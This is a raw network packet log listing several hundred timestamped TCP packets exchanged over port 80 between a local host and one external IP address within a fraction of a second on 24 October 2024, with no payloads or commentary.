Oct 24, 2024 13:54:22.841892958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.841947079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.841972113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.841985941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.841986895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.842353106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.884447098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.884495020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.884505987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.884536028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.910831928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.910890102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.910901070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.910939932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.910948038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.910974979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.910999060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911010981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911016941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911045074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911056995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911081076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911114931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911129951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911151886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911151886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911195040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911210060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911253929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911264896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911299944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911308050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911346912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911355972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911410093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911464930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911468029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911503077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911546946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911556959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911592960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911601067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911645889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911679983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911700010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911714077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911720037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911745071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911778927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911788940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911813974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911848068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911860943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911884069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911899090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911917925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911926985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.911953926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.911989927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912005901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912024021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912046909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912058115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912067890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912092924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912100077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912127972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912154913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912158966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912174940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912204981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912215948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912270069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912278891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912300110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912331104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912331104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912358046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912400007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912420034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912461996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912473917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912525892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912569046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912576914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912641048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912668943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912678003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912700891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912703037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912713051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912744999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912790060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912800074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912838936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912872076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912884951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912909031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912938118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912949085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.912971973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.912983894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913007975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913039923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913048029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913078070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913091898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913110971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913120985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913146973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913180113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913181067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913198948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913218021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913247108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913266897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913279057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913295984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913312912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913317919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913352013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913395882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913429976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913440943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913464069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913464069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913499117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913506985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913535118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913537979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913577080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913577080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913611889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913620949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913647890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913661003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913682938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913719893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913733006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913753986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913758993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913789988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913824081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913834095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913860083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913877010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913894892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913903952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913932085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.913938046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913965940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.913969040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914004087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914005995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914033890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914041996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914088964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914134026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914145947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914175987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914187908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914220095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914230108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914266109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914273024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914299965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914307117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914355993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914407969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914408922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914444923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914478064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914489985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914511919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914546967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914556980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914582014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914593935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914616108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914661884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914668083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914706945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914750099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914763927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914808989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914817095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914871931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914882898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914921999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.914931059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.914988041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915021896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915028095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915055037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915057898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915091991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915137053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915143967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915178061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915213108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915229082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915265083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915306091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915311098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915354013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915385962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915431976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915445089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915476084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915487051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915517092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915528059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915565014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915569067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915605068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915607929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915643930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915652037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915685892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915699005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915745974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915751934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915786982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915801048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915823936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915853977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915868998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915893078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.915904999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915940046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.915973902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916004896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916019917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916069984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916100979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916104078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916120052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916140079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916173935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916188955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916229010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916254044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916260004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916281939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916338921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916383028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916390896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916430950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916472912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916481972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916521072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916553974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916568041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916588068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916593075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916624069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916659117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916670084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916692972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916697979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916728020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916758060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916774988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916793108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916829109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916840076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916862965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916868925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916898966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916935921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.916940928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.916970968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917005062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917015076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917042017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917046070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917078018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917093992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917113066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917120934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917148113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917157888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917181969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917190075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917215109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917224884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917249918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917254925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917289972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917323112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917332888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917356968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917392015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917417049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917423964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917459965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917464018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917469025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917498112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917514086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917534113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917567015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917576075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917602062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917619944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917635918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917645931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917671919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917684078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917707920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917723894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917742014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917753935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917777061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917783022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917813063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917819023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917845011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917851925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917880058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917917967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917923927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.917952061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917987108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.917995930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.918020964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918030024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.918056011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918088913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918101072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.918123960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918155909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.918167114 CEST	49714	80	192.168.2.6	95.182.96.50
